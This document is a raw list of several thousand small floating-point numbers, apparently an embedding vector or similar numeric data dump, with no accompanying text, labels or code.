-0.003629228100180626, 0.0013815220445394516, 0.0004117497883271426, 0.0021383920684456825, -0.007562453858554363, 0.005576060153543949, -0.008795100264251232, 0.013475826010107994, 0.017406968399882317, 0.023586859926581383, 0.0012784544378519058, 0.005955015774816275, -0.013342566788196564, -0.03821204602718353, -0.02631867118179798, -0.02233755588531494, 0.020355327054858208, 0.013983876444399357, 0.012126578018069267, 0.058534055948257446, 0.022870592772960663, -0.0037770625203847885, -0.01749025657773018, -0.004103963728994131, -0.006817035377025604, 0.02305382303893566, -0.007325085811316967, -0.001745902351103723, -0.017873376607894897, -0.019039392471313477, 0.010335908271372318, 0.01517487969249487, 0.029949981719255447, -0.00012493040412664413, -0.0003157095343340188, 0.01191003154963255, -0.009228192269802094, -0.009361451491713524, 0.0032377794850617647, 0.0239699799567461, -0.006800378207117319, 0.01769014447927475, -0.008661841042339802, -0.014641842804849148, -0.010893930681049824, -0.01626593805849552, 0.011068833991885185, -0.006546352989971638, 0.010360894724726677, 0.002340362872928381, 0.021854491904377937, -0.004181004129350185, 0.014516912400722504, 0.002434060676023364, -0.00510965334251523, -0.006633804179728031, -0.03009989857673645, -0.015191536396741867, -0.00009747174044605345, -0.0338311530649662, -0.023536887019872665, -0.018306467682123184, -0.0012399342376738787, 0.0009182384237647057, 0.01992223411798477, 0.02042195573449135, 0.017123794183135033, 0.002367431065067649, -0.0025881414767354727, -0.020838391035795212, -0.0069461301900446415, 0.016607414931058884, -0.0009203206282109022, -0.026468588039278984, 0.017057163640856743, -0.002202939474955201, -0.020388642325997353, -0.0038436921313405037, 0.003158656880259514, 0.02851744554936886, -0.002425731858238578, 0.021787861362099648, 0.007687384262681007, 0.0035959132947027683, -0.015233180485665798, -0.0008099654223769903, 0.02676841989159584, 0.012684600427746773, -0.022154323756694794, 0.007658233400434256, -0.008245406672358513, 0.0007704041199758649, -0.00882008671760559, 0.0030337264761328697, -0.015416411682963371, 0.028300900012254715, 0.01742362603545189, -0.027584632858633995, 0.017540227621793747, -0.011510253883898258, 0.031499117612838745, -0.0038811711128801107, 0.0013117692433297634, -0.008207927457988262, 0.012301480397582054, -0.0022425006609410048, 0.017790088430047035, -0.0056135393679142, -0.0006683776737190783, 0.0096945995464921, 0.025952208787202835, -0.0009848680347204208, 0.012193207629024982, -0.0017417380586266518, -0.015191536396741867, -0.026235384866595268, 0.00028291530907154083, 0.010044404305517673, -0.01119376439601183, -0.003629228100180626, -0.02010546624660492, -0.001196208642795682, -0.01397554762661457, -0.007566617801785469, -0.0014439872466027737, -0.008545239455997944, 0.007620754651725292, -0.03551355004310608, 0.007724863011389971, -0.0010723192244768143, 0.025052709504961967, 0.007300099823623896, -0.009777885861694813, 0.008728470653295517, -0.0071751694194972515, 0.019622402265667915, 0.025385858491063118, -0.0029400286730378866, -0.00461826054379344, 0.015641286969184875, 0.012742901220917702, 0.002785947872325778, -0.01644084043800831, -0.012434739619493484, -0.012034961953759193, -0.00013729330385103822, -0.0017927512526512146, -0.00025766895851120353, 0.012151563540101051, 0.0005970632191747427, -0.019155994057655334, 0.0030982738826423883, -0.0015168632380664349, -0.006592161022126675, -0.014450282789766788, 0.0034043535124510527, -0.01100220438092947, -0.0043059345334768295, -0.005367842968553305, 0.013800645247101784, 0.004672396928071976, 0.0008614992257207632, 0.0025256762746721506, -0.009136577136814594, -0.0016334650572389364, 0.0031190956942737103, -0.010202649049460888, -0.009211534634232521, -0.006571338977664709, 0.004051909316331148, 0.0035251195076853037, 0.03388112410902977, 0.015183208510279655, -0.005805099382996559, 0.017073821276426315, 0.026618504896759987, 0.0053012133575975895, 0.003939472138881683, -0.0063339713960886, 0.008103818632662296, 0.012792873196303844, 0.0006511997198686004, 0.027134884148836136, 0.00048722856445237994, -0.013917246833443642, -0.002692250069230795, -0.01737365499138832, -0.009478053078055382, -0.0069461301900446415, -0.0014845896512269974, 0.0018083675531670451, 0.008016367442905903, -0.019022736698389053, 0.0016022324562072754, 0.0058300853706896305, 0.003423093119636178, 0.025185968726873398, -0.02748468890786171, 0.0010744014289230108, -0.014708472415804863, -0.008024696260690689, -0.0015449726488441229, -0.0033169020898640156, 0.027184855192899704, 0.010360894724726677, 0.03151577711105347, -0.0038520207162946463, -0.012118249200284481, 0.014058834873139858, -0.020455271005630493, 0.010094376280903816, 0.0013284266460686922, 0.014100478030741215, -0.014017190784215927, 0.031948868185281754, -0.0038770067039877176, 0.030699564144015312, -0.0071127042174339294, -0.002727647079154849, -0.014550227671861649, 0.00849110260605812, -0.0031190956942737103, 0.007266785018146038, -0.02755131758749485, -0.010036075487732887, 0.006796213798224926, -0.008620197884738445, -0.007229305803775787, 0.017057163640856743, 0.012201535515487194, 0.01550802681595087, 0.016624072566628456, -0.011918360367417336, -0.013475826010107994, -0.009644626639783382, -0.0012118249433115125, -0.009827857837080956, 0.00715018343180418, -0.000909389229491353, -0.009528025053441525, 0.016107693314552307, 0.013759001158177853, -0.02990000881254673, 0.011610198765993118, -0.008020531386137009, -0.00950303953140974, -0.04597438871860504, 0.0027651262935250998, 0.0045932745561003685, -0.0013471661368384957, 0.009003317914903164, -0.007400044240057468, -0.0017219573492184281, -0.0008490061736665666, 0.005022202152758837, -0.010252621956169605, -0.012318138033151627, 0.011202092282474041, -0.01005273312330246, -0.003146163886412978, 0.003356463508680463, 0.01945582777261734, 0.023403627797961235, -0.004318427760154009, 0.015041620470583439, 0.02473622001707554, -0.020721789449453354, 0.019555771723389626, -0.002713071880862117, 0.003481393912807107, -0.01827315427362919, 0.008328692987561226, 0.0025527444668114185, 0.009286493062973022, -0.0037978840991854668, -0.011318694800138474, 0.00515962578356266, 0.009977774694561958, -0.0034897224977612495, 0.0071127042174339294, -0.006421422585844994, 0.0007943491218611598, 0.01380897406488657, 0.0006350628682412207, 0.03767900913953781, -0.011060505174100399, 0.0024881970603019, -0.027334772050380707, 0.018506357446312904, -0.0035459413193166256, 0.003331477288156748, 0.016732344403862953, 0.014317024499177933, 0.003046219702810049, -0.00493058655411005, 0.01357576996088028, 0.008536910638213158, 0.009053289890289307, 0.011735129170119762, -0.0002605319314170629, -0.010310922749340534, 0.012393095530569553, -0.00828704982995987, -0.004251798149198294, 0.009003317914903164, -0.0038811711128801107, -0.016790645197033882, -0.00868682749569416, 0.017973320558667183, 0.001911435159854591, -0.03757906332612038, 0.0036708717234432697, -0.008611869066953659, 0.002927535679191351, -0.006871172226965427, 0.03607989847660065, 0.0002946275344584137, 0.007512481417506933, 0.024919450283050537, -0.019755661487579346, -0.005230419337749481, 0.0007599932723678648, 0.011568555608391762, -0.004897271748632193, -0.00007203018321888521, 0.02578563429415226, -0.007125197444111109, 0.003031644504517317, -0.006817035377025604, -0.020721789449453354, 0.003260683501139283, 0.008187105879187584, -0.0029546041041612625, 0.011826744303107262, 0.020671816542744637, 0.01073568593710661, 0.0037499943282455206, 0.0062506846152246, -0.006492216605693102, -0.01553301326930523, -0.0017937923548743129, -0.007733191829174757, -0.0127595579251647, -0.01860630139708519, -0.001379439840093255, -0.00131385144777596, 0.014583542011678219, 0.004672396928071976, -0.004376728553324938, -0.00003175314486725256, -0.014008861966431141, 0.0037978840991854668, -0.013076048344373703, -0.0036479677073657513, 0.003795802127569914, 0.003550105495378375, 0.004851463716477156, 0.0018229427514597774, -0.016041062772274017, -0.009361451491713524, 0.012143234722316265, -0.02755131758749485, 0.024836163967847824, -0.011485268361866474, 0.00923652108758688, -0.00584257859736681, 0.0010171417379751801, -0.006234026979655027, 0.025485802441835403, 0.018839504569768906, 0.009278164245188236, 0.003918650094419718, 0.006121589802205563, 0.010635741986334324, -0.023320341482758522, -0.002477786270901561, 0.023553544655442238, -0.00813296902924776, 0.006758734583854675, 0.0012847009347751737, 0.015632957220077515, 0.008595211431384087, 0.004074813332408667, -0.02708491124212742, 0.015491370111703873, -0.009544682689011097, -0.002686003688722849, 0.01789003424346447, 0.011376995593309402, -0.003966540098190308, -0.014217079617083073, 0.015757888555526733, -0.007204319816082716, 0.0028671526815742254, 0.00212902226485312, 0.03258184716105461, 0.006804542616009712, -0.011243736371397972, 0.0005236666183918715, 0.015574656426906586, 0.01927259750664234, -0.006134082563221455, 0.010585769079625607, 0.014192094095051289, 0.002109241671860218, -0.009777885861694813, -0.012301480397582054, 0.007370893843472004, 0.0013336320407688618, 0.004310098942369223, -0.00007638973329449072, 0.0022445828653872013, 0.024369757622480392, 0.02728479914367199, -0.016632400453090668, 0.0037499943282455206, 0.007853957824409008, 0.023586859926581383, -0.01433368120342493, -0.00124409853015095, 0.017223738133907318, 0.010835629887878895, 0.010136020369827747, 0.0011108395410701632, 0.0056010461412370205, 0.027534659951925278, 0.018256496638059616, -0.027784520760178566, 0.009003317914903164, -0.02077176235616207, -0.013475826010107994, -0.022620731964707375, -0.037312544882297516, 0.010244293138384819, -0.022021066397428513, 0.014242066070437431, -0.0003547502856235951, -0.005251241382211447, 0.0029087960720062256, 0.003554269904270768, 0.011743457987904549, -0.009119919501245022, -0.016490813344717026, -0.0008417185745202005, 0.007516645826399326, -0.005505266599357128, -0.0068878293968737125, 0.013792316429316998, -0.013850617222487926, -0.000767280871514231, -0.027384744957089424, -0.012659613974392414, 0.01737365499138832, -0.0071168686263263226, 0.007828972302377224, 0.002540251472964883, 0.014083820395171642, -0.006134082563221455, -0.003171150106936693, 0.006421422585844994, -0.005584388971328735, -0.009394765831530094, -0.00040290053584612906, 0.011343680322170258, -0.0015803695423528552, -0.00868682749569416, 0.016549114137887955, -0.01670735888183117, -0.00845778826624155, 0.009061618708074093, 0.012518025934696198, 0.0013971383450552821, -0.005047188140451908, 0.00033262718352489173, -0.02193777821958065, 0.02077176235616207, 0.013492483645677567, -0.003177396487444639, -0.013592427596449852, -0.014325352385640144, -0.008928359486162663, 0.0034376683179289103, 0.007000267039984465, -0.0238200630992651, -0.010760672390460968, 0.0017032178584486246, 0.0050638457760214806, -0.007791492622345686, 0.004205990117043257, -0.015241509303450584, -0.014925018884241581, -0.0020124204456806183, -0.004099799320101738, -0.012293151579797268, 0.013325909152626991, 0.011643513105809689, -0.010310922749340534, -0.00904496107250452, 0.000957279175054282, -0.0068128714337944984, -0.000954155926592648, -0.0014845896512269974, 0.004385056905448437, 0.009253178723156452, 0.0019468320533633232, -0.023270368576049805, 0.012776215560734272, -0.005201268941164017, 0.028067696839571, 0.005105488933622837, -0.01664905808866024, -0.012776215560734272, 0.014775102026760578, -0.01081064436584711, 0.011468610726296902, 0.0010332785313948989, 0.0013294677482917905, -0.009802872315049171, 0.002486115088686347, 0.005721812602132559, 0.01822318136692047, 0.0008349515264853835, -0.013392538763582706, -0.021637946367263794, -0.0007428153185173869, 0.009744571521878242, 0.006979444995522499, -0.005105488933622837, -0.0025464980863034725, 0.009019974619150162, 0.012817859649658203, -0.019439170137047768, -0.01335089560598135, -0.004280948545783758, 0.015216522850096226, 0.013825630769133568, 0.00872014183551073, 0.015399754047393799, 0.018822846934199333, -0.023353656753897667, -0.026268698275089264, 0.021454714238643646, 0.01612435095012188, -0.0026672640815377235, -0.009444738738238811, 0.002738057868555188, 0.006937801837921143, 0.014641842804849148, 0.025502460077404976, 0.01452524121850729, -0.0013836042489856482, -0.0023695132695138454, 0.0039498829282820225, -0.016599085181951523, -0.0010036075254902244, -0.01742362603545189, -0.011243736371397972, 0.014183765277266502, -0.0050596813671290874, -0.014908361248672009, -0.012942790053784847, 0.00133467314299196, 0.008678498677909374, -0.013942233286798, 0.013550784438848495, -0.006329806987196207, -0.004963901359587908, -0.007729027420282364, -0.0015574656426906586, -0.002150885062292218, -0.0002876001817639917, 0.01808992214500904, 0.008166284300386906, 0.0032127934973686934, -0.028367530554533005, -0.004884778521955013, -0.0034793117083609104, 0.011918360367417336, 0.018706245347857475, 0.02133811265230179, 0.005147132556885481, -0.02793443761765957, 0.013759001158177853, 0.0008922112756408751, 0.02220429666340351, 0.026885023340582848, -0.0008552527287974954, -0.007429194636642933, -0.001285742036998272, 0.0239699799567461, -0.00787061545997858, -0.009711256250739098, -0.006275670602917671, 0.020871706306934357, -0.0025111010763794184, -0.027901122346520424, 0.001936421263962984, -0.026285355910658836, -0.0003841609868686646, -0.006209040991961956, -0.012584655545651913, -0.005217926576733589, -0.015133235603570938, 0.004568288568407297, 0.016923904418945312, -0.0113936522975564, -0.011876717209815979, 0.030083240941166878, 0.005197104532271624, 0.007716534659266472, -0.005280391778796911, -0.01587449014186859, -0.008445295505225658, 0.0126679427921772, 0.001942667760886252, -0.00724596343934536, -0.015707915648818016, -0.021071594208478928, 0.012151563540101051, 0.003445996902883053, 0.01321763638406992, -0.012842845171689987, 0.005505266599357128, 0.006283999420702457, 0.001531438552774489, -0.024069923907518387, 0.013700700365006924, -0.033398061990737915, 0.008953345008194447, -0.00045026998850516975, -0.0035105443093925714, 0.008803429082036018, 0.006637968588620424, -0.012809530831873417, 0.010161005891859531, 0.009411423467099667, -0.001489795045927167, 0.0036104887258261442, 0.012942790053784847, -0.014133792370557785, -0.009036632254719734, 0.01380897406488657, 0.0016542867524549365, -0.0017958745593205094, 0.00013059131742920727, 0.002438225084915757, -0.01822318136692047, -0.0017823403468355536, 0.001745902351103723, 0.015957776457071304, -0.020338669419288635, 0.0155663276091218, 0.018972763791680336, -0.01664073020219803, 0.031165970489382744, 0.01927259750664234, -0.015374768525362015, 0.0029691793024539948, -0.008045517839491367, -0.022354213520884514, 0.005313706584274769, 0.00538450013846159, 0.009711256250739098, -0.0028567418921738863, 0.004089388530701399, -0.009811201132833958, 0.030216500163078308, -0.01149359717965126, -0.003069123486056924, -0.014608528465032578, -0.015582985244691372, 0.006142411381006241, 0.029350316151976585, 0.004993051756173372, 0.00032377796014770865, -0.023003851994872093, -0.015899475663900375, -0.005438636988401413, -0.020322011783719063, 0.000857334875036031, -0.009869501926004887, -0.01892279088497162, -0.0035022154916077852, -0.02173789031803608, 0.00790392979979515, 0.012634627521038055, 0.013750673271715641, 0.007441687397658825, 0.0012336877407506108, -0.011476939544081688, -0.0006699392688460648, 0.0072959354147315025, -0.01651579886674881, 0.007537467405200005, 0.005971673410385847, -0.019672373309731483, -0.011010533198714256, 0.03414764255285263, -0.020055493339896202, 0.01893944852054119, -0.004784834571182728, 0.03637973219156265, -0.006687941029667854, 0.024403071030974388, 0.02526925504207611, 0.0017000945517793298, 0.0018021210562437773, -0.009344793856143951, -0.00732925022020936, -0.000629336922429502, 0.0018094086553901434, 0.0031482460908591747, 0.016032734885811806, 0.000971333880443126, -0.017023850232362747, 0.000864101923070848, 0.016282595694065094, 0.010027746669948101, 0.012976104393601418, -0.001330508734099567, 0.0024361428804695606, -0.02401995100080967, 0.015216522850096226, 0.016599085181951523, 0.006017480976879597, 0.009253178723156452, -0.0028359200805425644, 0.003931143321096897, 0.0017677651485428214, -0.00651303818449378, 0.0370793417096138, 0.000019243836504756473, -0.004730697721242905, -0.0018375179497525096, 0.002523594070225954, -0.008070504292845726, -0.007933080196380615, -0.0038145415019243956, -0.00047968068975023925, 0.0022591580636799335, 0.005092996172606945, 0.003219040110707283, -0.0004294482641853392, 0.027318114414811134, -0.0016667797463014722, 0.0026401958893984556, -0.00773735623806715, -0.008033025078475475, 0.012842845171689987, -0.007216813042759895, -0.029850037768483162, 0.017207080498337746, -0.020938334986567497, -0.01207660511136055, -0.019955549389123917, -0.018972763791680336, -0.021321455016732216, 0.0025839770678430796, 0.012318138033151627, 0.0022487472742795944, 0.007041910197585821, 0.013267608359456062, -0.006038302555680275, 0.004260126501321793, -0.004410043358802795, 0.007716534659266472, 0.01425872277468443, 0.001669903052970767, -0.0021592138800770044, -0.008116311393678188, 0.01762351579964161, 0.0020072150509804487, -0.006592161022126675, 0.026218727231025696, -0.02723482809960842, -0.01145195309072733, -0.010960560292005539, -0.013759001158177853, 0.014641842804849148, -0.015316466800868511, -0.008436966687440872, -0.0005658306181430817, 0.003229450900107622, -0.0294336024671793, -0.000013395857422437984, 0.0014273298438638449, -0.014292038045823574, 0.003612570697441697, 0.017073821276426315, 0.006188219413161278, -0.021271483972668648, -0.003947800491005182, 0.0007625959697179496, -0.008895044215023518, -0.013242622837424278, 0.02070513181388378, 0.015358110889792442, -0.015458054840564728, -0.006546352989971638, -0.0018156551523134112, -0.013267608359456062, -0.007679055444896221, -0.0006767063168808818, -0.005725976545363665, 0.0029025496914982796, -0.024636276066303253, -0.001704258844256401, -0.014958333224058151, -0.00037427066126838326, -0.010785657912492752, -0.03361460566520691, 0.016099363565444946, -0.015183208510279655, 0.008511925116181374, -0.016657385975122452, -0.014292038045823574, -0.010652398690581322, 0.016174321994185448, -0.00904496107250452, 0.006338135804980993, 0.005267898552119732, -0.007695712614804506, -0.0031815608963370323, -0.011926689185202122, 0.0019072707509621978, -0.00669210497289896, 0.01501663401722908, -0.005372007377445698, 0.0027151540853083134, -0.003685446921736002, -0.004355906508862972, 0.004980558529496193, 0.005267898552119732, -0.005705154966562986, -0.0025527444668114185, -0.0013513305457308888, -0.005501102190464735, 0.0006345423171296716, -0.03128257393836975, 0.010127691552042961, 0.0010161006357520819, -0.023270368576049805, -0.01730702444911003, 0.0077040414325892925, -0.0011160449357703328, -0.016807302832603455, -0.005018037743866444, 0.0023153768852353096, -0.0051221465691924095, 0.002304965863004327, -0.015458054840564728, 0.013034405186772346, -0.010019417852163315, 0.004913928918540478, 0.004268455319106579, -0.0013023994397372007, -0.003277340903878212, 0.0037728981114923954, 0.007666562218219042, 0.004318427760154009, 0.014058834873139858, -0.012051619589328766, -0.0006584873190149665, 0.036912769079208374, 0.020405298098921776, -0.0018406412564218044, 0.002842166693881154, -0.010535797104239464, -0.010369223542511463, 0.022687360644340515, 0.004156018141657114, 0.0037062685005366802, 0.000418256560806185, 0.019539114087820053, 0.00972791388630867, -0.001704258844256401, 0.014441954903304577, -0.006134082563221455, -0.02690167911350727, 0.003360627917572856, -0.006225698161870241, 0.02645193040370941, -0.008628526702523232, 0.02317042462527752, -0.002686003688722849, -0.004876450169831514, 0.0047265333123505116, 0.023686803877353668, 0.0009031426743604243, -0.0038207881152629852, 0.004622424952685833, -0.0010488948319107294, 0.014275380410254002, -0.01815655082464218, 0.0127595579251647, 0.008545239455997944, 0.010927245952188969, 0.0026152096688747406, -0.005484444554895163, -0.015491370111703873, -0.017906690016388893, 0.008024696260690689, -0.020322011783719063, -0.02023872546851635, 0.02585226483643055, 0.006904487032443285, 0.03727923333644867, -0.022803962230682373, -0.00015369041648227721, 0.0007011718698777258, 0.012834516353905201, -0.005051352549344301, 0.0032169579062610865, -0.01158521231263876, -0.01035256590694189, 0.009652955457568169, 0.005055516958236694, 0.022704018279910088, 0.007033581845462322, -0.0022529116831719875, -0.014833402819931507, 0.01204329077154398, -0.0006246520206332207, 0.005388664547353983, -0.004639082122594118, -0.003516790922731161, 0.010460838675498962, -0.0010634700302034616, -0.011285379528999329, -0.014133792370557785, -0.014050506055355072, -0.006150740198791027, 0.003308573504909873, -0.005367842968553305, -0.008695156313478947, -0.005775948986411095, 0.00556773180142045, 0.023386972025036812, -0.025352543219923973, 0.0037916377186775208, 0.002658935496583581, -0.02155465818941593, -0.024336442351341248, -0.013908918015658855, -0.0064672306180000305, 0.014758444391191006, -0.007849793881177902, 0.008795100264251232, 0.005705154966562986, 0.011160449124872684, -0.0035771739203482866, 0.017540227621793747, 0.012376438826322556, 0.001897901063784957, 0.002802605275064707, 0.015441397204995155, 0.002967097098007798, -0.004443358164280653, -0.003273176494985819, -0.019872263073921204, 0.0028317556716501713, 0.007146019022911787, -0.009286493062973022, 0.011127134785056114, 0.03296496719121933, -0.011110477149486542, -0.009353122673928738, 0.004568288568407297, 0.012293151579797268, 0.0022216790821403265, 0.017190422862768173, 0.0039436365477740765, -0.029033824801445007, 0.010044404305517673, -0.017906690016388893, 0.007091882638633251, -0.0017261217581108212, 0.013367553241550922, 0.003785391105338931, 0.02330368384718895, -0.011143791489303112, -0.0009692516759969294, 0.024069923907518387, 0.005805099382996559, 0.0007032540743239224, 0.01807326450943947, 0.00525540579110384, -0.01744028367102146, -0.026718448847532272, 0.015882818028330803, 0.011593541130423546, 0.01230980921536684, 0.000933334231376648, -0.013067720457911491, -0.02880062162876129, -0.003460572101175785, 0.017406968399882317, -0.011210421100258827, 0.004351742099970579, 0.010627413168549538, 0.0005845701671205461, -0.02023872546851635, -0.00039431158802472055, 0.02388669364154339, 0.006025809794664383, 0.009719585068523884, -0.027901122346520424, 0.011993318796157837, -0.009219863452017307, 0.0064672306180000305, -0.013051062822341919, -0.016165994107723236, 0.02088836394250393, 0.0021425564773380756, 0.0236368328332901, 0.019955549389123917, 0.0021248578559607267, -0.002979590091854334, 0.011277050711214542, -0.016932234168052673, -0.006650461815297604, 0.0016199308447539806, 0.01978897489607334, 0.00543447257950902, -0.016599085181951523, -0.0034668187145143747, 0.013442511670291424, -0.006850350182503462, -0.0017667240463197231, -0.010835629887878895, 0.005392828956246376, 0.016557442024350166, 0.023453600704669952, -0.023153766989707947, -0.008920030668377876, -0.0017511077458038926, -0.009144905023276806, -0.002544415881857276, -0.00235077366232872, -0.013409196399152279, -0.0023341162595897913, -0.014383653178811073, -0.01348415482789278, 0.0007761301239952445, -0.005734305363148451, -0.008087160997092724, 0.005584388971328735, 0.0014408639399334788, -0.004830642137676477, 0.01302607636898756, -0.003926978912204504, -0.006042466964572668, 0.006050795782357454, 0.0069336374290287495, -0.006288163363933563, -0.010485825128853321, 0.0010207855375483632, 0.0032627657055854797, 0.0037978840991854668, -0.015682930126786232, -0.016932234168052673, -0.003543859114870429, -0.008853401057422161, -0.021904462948441505, -0.007495824247598648, -0.0034793117083609104, 0.003481393912807107, -0.008053846657276154, -0.016299253329634666, -0.0005528170149773359, 0.007021088618785143, 0.026918336749076843, 0.0035063799005001783, 0.0007178292726166546, 0.007799821440130472, 0.003529283916577697, 0.0032273686956614256, -0.002675592666491866, -0.013009418733417988, -0.008212091401219368, -0.007433359045535326, -0.026651818305253983, 0.016557442024350166, -0.008836743421852589, 0.00874512828886509, 0.013017747551202774, 0.01912268064916134, 0.01116877794265747, -0.009169891476631165, 0.020222067832946777, -0.004768176935613155, 0.0030337264761328697, -0.016532456502318382, 0.01560797169804573, 0.008345350623130798, -0.0015512191457673907, 0.019689030945301056, 0.014700143598020077, 0.0207551047205925, -0.006696269381791353, 0.004601602908223867, -0.02003883570432663, 0.0002738058101385832, -0.0069461301900446415, 0.008357844315469265, -0.00828704982995987, -0.01507493481040001, -0.00642975140362978, -0.004963901359587908, 0.005817592144012451, -0.010602426715195179, -0.016532456502318382, -0.0015241509536281228, 0.01443362608551979, 0.003602159908041358, -0.021687917411327362, -0.006850350182503462, 0.014183765277266502, -0.00021160086907912046, -0.010535797104239464, -0.0015907804481685162, -0.018256496638059616, -0.004022758919745684, 0.005076338537037373, -0.025385858491063118, -0.010444181971251965, -0.0011805923422798514, 0.013875603675842285, -0.0050721741281449795, -0.025569088757038116, 0.02305382303893566, -0.015366439707577229, 0.017673486843705177, -0.006542188581079245, -0.019155994057655334, -0.0032003005035221577, 0.015449726022779942, 0.0028546596877276897, 0.0015137400478124619, 0.011535240337252617, 0.03133254498243332, -0.010327579453587532, 0.010161005891859531, 0.013250951655209064, 0.006317313760519028, -0.018039949238300323, -0.010802315548062325, 0.006546352989971638, 0.008216256275773048, -0.01018599234521389, -0.020055493339896202, -0.007828972302377224, -0.0044725085608661175, 0.01181841641664505, 0.005034695379436016, 0.0014991648495197296, -0.004988887347280979, -0.001597026945091784, -0.017406968399882317, -0.00724596343934536, -0.008399487473070621, -0.0077831638045609, 0.022953879088163376, 0.020971650257706642, -0.0071751694194972515, 0.004672396928071976, 0.00610493216663599, 0.0024757040664553642, -0.017140451818704605, -0.016923904418945312, -0.015166550874710083, 0.025802291929721832, -0.01750691421329975, 0.008728470653295517, -0.0007251168717630208, 0.002225843258202076, 0.022770646959543228, 0.01524983812123537, -0.010669056326150894, -0.0006402683211490512, 0.02063850313425064, -0.03048301860690117, -0.0007542673265561461, -0.03977784141898155, 0.012476382777094841, 0.005147132556885481, -0.0046640681102871895, -0.004643246531486511, 0.0038978285156190395, -0.007587439846247435, -0.009719585068523884, 0.006642132997512817, -0.0037062685005366802, 0.013509140349924564, 0.02153800055384636, -0.008145461790263653, 0.013883931562304497, 0.010044404305517673, -0.01185173075646162, -0.003931143321096897, -0.0005897756200283766, 0.025935551151633263, -0.001745902351103723, -0.010419195517897606, -0.014375325292348862, 0.017140451818704605, -0.015483041293919086, 0.027518002316355705, -0.006604653783142567, 0.01367571484297514, 0.0005044065183028579, -0.03153243288397789, -0.022287582978606224, -0.007454180624336004, -0.012967775575816631, -0.0004958175122737885, -0.010560783557593822, -0.012226521968841553, -0.005076338537037373, 0.0013971383450552821, -0.013017747551202774, -0.023786747828125954, 0.011843401938676834, -0.012109920382499695, 0.009019974619150162, 0.017023850232362747, 0.011901702731847763, -0.010235964320600033, -0.00484729977324605, 0.025119340047240257, -0.007025253027677536, -0.009686270728707314, -0.0004135716881137341, 0.00855356827378273, 0.02167125977575779, -0.00732925022020936, 0.011743457987904549, -0.0033418883103877306, 0.0035063799005001783, 0.006092439405620098, -0.021138224750757217, 0.0072209774516522884, 0.02390334941446781, -0.008124640211462975, -0.0011941264383494854, 0.002277897670865059, 0.009969445876777172, -0.009086604230105877, -0.023920007050037384, 0.0036104887258261442, -0.023353656753897667, -0.021521344780921936, 0.042476337403059006, 0.010802315548062325, -0.009411423467099667, -0.01220986433327198, 0.0250027384608984, -0.0056968261487782, -0.0297667495906353, 0.012051619589328766, 0.027867808938026428, -0.016599085181951523, 0.000791746424511075, -0.0025464980863034725, -0.004672396928071976, 0.0183564405888319, 0.0008396364282816648, -0.011327022686600685, 0.009153233841061592, 0.015108250081539154, 0.00836200825870037, -0.007562453858554363, -0.015574656426906586, -0.02676841989159584, -0.006596325431019068, 0.0006298574153333902, -0.0015376850496977568, 0.00683785742148757, -0.025902235880494118, 0.013958889991044998, 0.0008719100733287632, 0.015399754047393799, -0.022687360644340515, -0.013342566788196564, -0.011935018002986908, -0.005821756552904844, 0.0024465536698698997, -0.0074125370010733604, -0.009844515472650528, 0.016091035678982735, -0.004339249338954687, 0.003377285087481141, -0.01945582777261734, -0.005334528163075447, -0.008595211431384087, 0.000629336922429502, 0.002288308460265398, -0.017773432657122612, -0.0020634338725358248, 0.020838391035795212, 0.012476382777094841, -0.008107983507215977, 0.008253735490143299, 0.003937389701604843, 0.009128248319029808, 0.043442465364933014, 0.009444738738238811, -0.01689891889691353, -0.011302037164568901, -0.004901436157524586, -0.003014987101778388, -0.021188195794820786, -0.007137690205127001, 0.01008604746311903, 0.005742634180933237, -0.01586616039276123, 0.006642132997512817, 0.0035938313230872154, 0.025119340047240257, 0.007420865818858147, 0.002367431065067649, 0.0058758934028446674, 0.021004965528845787, -0.0015845339512452483, 0.00183231255505234, 0.005238748155534267, 0.025102682411670685, -0.0015303974505513906, -0.000529132317751646, -0.0032169579062610865, -0.010619084350764751, 0.010011089965701103, 0.014558556489646435, -0.024253156036138535, 0.03414764255285263, -0.010144348256289959, 0.00004554754195851274, -0.01021930668503046, -0.02506936714053154, -0.00907827541232109, -0.02493610791862011, 0.009911145083606243, -0.013659057207405567, 0.00024842930724844337, -0.02042195573449135, -0.014725130051374435, 0.012576326727867126, -0.004901436157524586, -0.002575648482888937, 0.01808992214500904, 0.006958623416721821, 0.006966952234506607, 0.018423069268465042, 0.01737365499138832, 0.014383653178811073, 0.01729036681354046, -0.0074167014099657536, 0.03106602653861046, -0.01226816512644291, 0.0017344504594802856, 0.017923347651958466, 0.005775948986411095, -0.00212902226485312, 0.007591604255139828, -0.005088831763714552, 0.0071168686263263226, 0.010285936295986176, 0.020855048671364784, -0.009311479516327381, -0.021904462948441505, -0.01833978295326233, 0.003362709889188409, 0.027584632858633995, 0.0075249746441841125, -0.016599085181951523, -0.023403627797961235, -0.007312593050301075, 0.0041268677450716496, 0.009019974619150162, 0.003131588688120246, -0.018972763791680336, -0.029350316151976585, -0.01100220438092947, 0.0054094865918159485, 0.007062732242047787, -0.003398106899112463, 0.0677289366722107, 0.006488052196800709, 0.008187105879187584, 0.012901145964860916, -0.0022529116831719875, -0.007629083003848791, 0.013300923630595207, -0.0006491175736300647, -0.030899452045559883, 0.0010733603266999125, -0.008495267480611801, -0.008378665894269943, 0.011235407553613186, -0.004368399735540152, -0.008811757899820805, -0.01308437716215849, -0.00724596343934536, -0.01750691421329975, 0.0024757040664553642, 0.006013316567987204, -0.0044267005287110806, 0.011960003525018692, 0.0032481905072927475, 0.01735699735581875, -0.0030816164799034595, 0.01253468357026577, -0.0015741230454295874, -0.00692114420235157, 0.008503596298396587, -0.037712324410676956, -0.003585502505302429, 0.007949737831950188, 0.003539694705978036, 0.013609085232019424, 0.015916133299469948, 0.0040061017498373985, 0.00461826054379344, 0.032548535615205765, 0.0038436921313405037, 0.011102148331701756, -0.0017167519545182586, -0.0012867831392213702, -0.02312045358121395, 0.0010827301302924752, -0.026518559083342552, -0.004768176935613155, -0.024053266271948814, -0.015541342087090015, 0.0034168465062975883, 0.005538580939173698, 0.011285379528999329, 0.03504714369773865, 0.022637389600276947, 0.020938334986567497, -0.02833421528339386, 0.018306467682123184, -0.0009453067323192954, -0.004622424952685833, 0.009211534634232521, 0.0018833257490769029, -0.0044725085608661175, -0.013500812463462353, -0.0023382806684821844, -0.008066339418292046, -0.0005679127643816173, 0.0027297292836010456, 0.00009174576553050429, -0.003283587284386158, 0.016765659675002098, 0.0035251195076853037, 0.008903373032808304, -0.00009831762145040557, -0.03667956590652466, -0.012118249200284481, -0.010285936295986176, -0.022370871156454086, 0.016016077250242233, 0.003096191678196192, -0.000050395101425237954, -0.00765406945720315, 0.011243736371397972, -0.012251508422195911, 0.00887838751077652, 